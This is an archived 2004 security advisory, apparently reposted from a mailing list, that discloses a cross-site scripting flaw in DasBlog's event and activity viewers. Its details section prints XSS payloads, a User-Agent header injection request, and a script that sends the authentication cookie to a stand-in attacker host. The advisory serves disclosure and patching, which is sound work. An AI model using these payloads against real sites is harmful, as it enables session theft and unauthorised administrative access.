Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Cross-Site Scripting Vulnerability in Newtelligence DasBlog

Cross-Site Scripting Vulnerability in Newtelligence DasBlog

From: Dominick Baier <seclists_at_leastprivilege.com>
Date: Wed, 1 Sep 2004 08:22:31 +0200

ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog

Author:
Dominick Baier <dbaier_at_ernw.de>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog's Event and Activity
Viewer allows to inject and execute code on the client's machine. This
allows an attacker to transfer the ASP.NET authentication cookie to a server
of his choice. The attacker can use this cookie to log on to DasBlog and
modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
        All

Browsers
        Tested with IE 6 and Firefox 0.93

4. Patch Availability :
http://www.gotdotnet.com/workspaces/releases/viewuploads.aspx?id=77a29128-47
46-4473-b676-e4f1517a1907
Vendor instructions
http://staff.newtelligence.net/clemensv/PermaLink.aspx?guid=69bce168-cb09-4f
09-8d53-f0b97f11b198

5. Details

The Activity and Events Viewer show details about requests that were made to
the blog site. As extra information they show the Referrers, Query Strings
and User Agents of these requests. It is possible to specially malform those
HTTP Headers to inject scripting code. This code gets embedded in the HTML
pages and executed on the client. With specially crafted JavaScript code a
attacker can transfer the ASP.NET Forms Authentication Cookie to a server of
the his choice. While injecting this cookie in a HTTP request to DasBlog he
can authenticate without having to know the username or the password and
enter the administrative area.

Examples of script injections

<script>alert('XSS')</script>
<img%20src="javascript:alert('XSS')">
<img%20src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a
;alert(&quot;XSS&quot;)>

Leading e.g. to the following HTTP request

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.victim.com\r\n
Accept: */*

Example of transferring a cookie using JavaScript

<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie=
'+document.cookie</script>

6. Solution
Install the patch.

7. Time-Line
The vulnerability was found on the 15th August 2004. The author was
contacted on the same day with a immediate response. The patch has been
provided on the 30.August 2004

8. Disclaimer
 
The informations in this advisory are provided "AS IS" without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

  

---
Dominick Baier, Dipl. Ing. Informationstechnik (BA)
.NET Architecture / Security Consultant
www.leastprivilege.com
ERNW GmbH / Zähringerstr. 49 / 69115 Heidelberg
Tel. +49 151 16 22 75 56 / Fax. +49 6221 419 008
dbaier_at_ernw.de / www.ernw.de
PGP (www.ernw.de/keys/dbaier.zip)
7AE0 B3D2 7FFC 7763 E32A  07C2 8B0D F988 DC8D BFB1
X509v3 (www.ernw.de/keys/dbaier_at_ernw.de.zip)
Received on Sep 05 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos